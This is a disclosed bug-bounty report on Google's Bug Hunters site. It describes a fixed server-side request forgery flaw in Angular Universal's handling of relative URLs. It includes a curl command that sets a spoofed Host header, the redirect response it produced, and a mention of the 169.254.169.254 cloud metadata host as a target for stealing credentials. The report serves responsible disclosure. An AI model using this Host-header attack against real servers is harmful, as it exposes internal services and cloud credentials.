Skip to Content (Press Enter)
Google
Bug Hunters
other in Angular
Reported by:
tyage
Google VRP
triaged
17:46 | Oct 27, 2020
accepted
01:04 | Oct 28, 2020
fixed
08:37 | Nov 12, 2020
reward decided
$5,000
Summary: Server Side Request Forgery
(I already reported this issue and it is already fixed in this PR
https://github.com/angular/angular/pull/39334
. I was told to submit the original report to this program after that.)
If an Angular universal application which has
@nguniversal/*-engine
package and enables
useAbsoluteUrl
option, the following component is automatically vulnerable to SSRF(Server Side Request Forgery).
export class TestComponent implements OnInit {
  constructor(private http: HttpClient) { }

  ngOnInit() {
    const result = this.http.get('/api/test')
  }
}
Detail
As the document says "You don't need to do anything to make relative URLs work on the server.", relative URLs for HTTP requests in the server side rendering are automatically converted and work. I think we need the useAbsoluteUrl option to use this feature in the latest version of angular.
https://angular.io/guide/universal#using-absolute-urls-for-http-data-requests-on-the-server
When the server calls
this.http.get('/api/test')
, the URL will be http://[HOST]/api/test and [HOST] comes from the request of HTTP client.
Therefore, if the attacker changes Host header to localhost, the server sends the request to localhost and it may return internal secret content to the attacker. This is an SSRF.
PoC app
To create a PoC app, I ran
ng new app
and
ng add @nguniversal/express-engine
and then added a few lines of codes. (I installed @angular/cli version 10.1.6)
Generated simple application is here.
https://github.com/tyage/angular-unviersal-sample-app
Following is the diff from auto-generated code. I guess it is simple and no one will expect there is a vulnerability.
https://github.com/tyage/angular-unviersal-sample-app/commit/2121558fa980a8a319f10561e2e71a6b88cc4467
Then, I started the server with
npm run build:ssr
and
npm run serve:ssr
. I think this is a simple and standard way to create a universal angular application.
Attack
To attack this server, I send an HTTP request with a modified Host header.
$ curl localhost:4000 -H "Host: mocos.kitchen:12345"
mocos.kitchen is my own server and it returns "301 Moved Permanently"
HTTP/1.1 301 Moved Permanently
Location: https://api.thecatapi.com/v1/categories/
Then, angular server fetches the contents of
https://api.thecatapi.com/v1/categories/
and injects it in the HTML. The attacker can change api.thecatapi.com to 169.254.169.254, which is a well-known SSRF target host in GCP or AWS since it returns credentials.
<span _ngcontent-sc11="">[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object] app is running!</span>
I recommend to add note in the docs
Furthermore, if the version of angular is 10.0.0-rc.0, it is automatically vulnerable to SSRF without the
useAbsoluteUrl
option.
I also looked into a sample application and I think this code is potentially vulnerable to SSRF. (This app is safe until now since it use HttpClientInMemoryWebApiModule to "simulate" the server)
https://github.com/angular/angular/blob/master/aio/content/examples/universal/src/app/hero.service.ts#L25
Browser/OS: Ubuntu 20.04, node.js v14.13.1
Attack scenario:
If an Angular universal application which has
@nguniversal/*-engine
package and enables
useAbsoluteUrl
option, malicious attacker can exploit this vulnerability.
They might be able to fetch credentials from 169.254.169.254 or some other internal servers.
登录
使用 Google 账号登录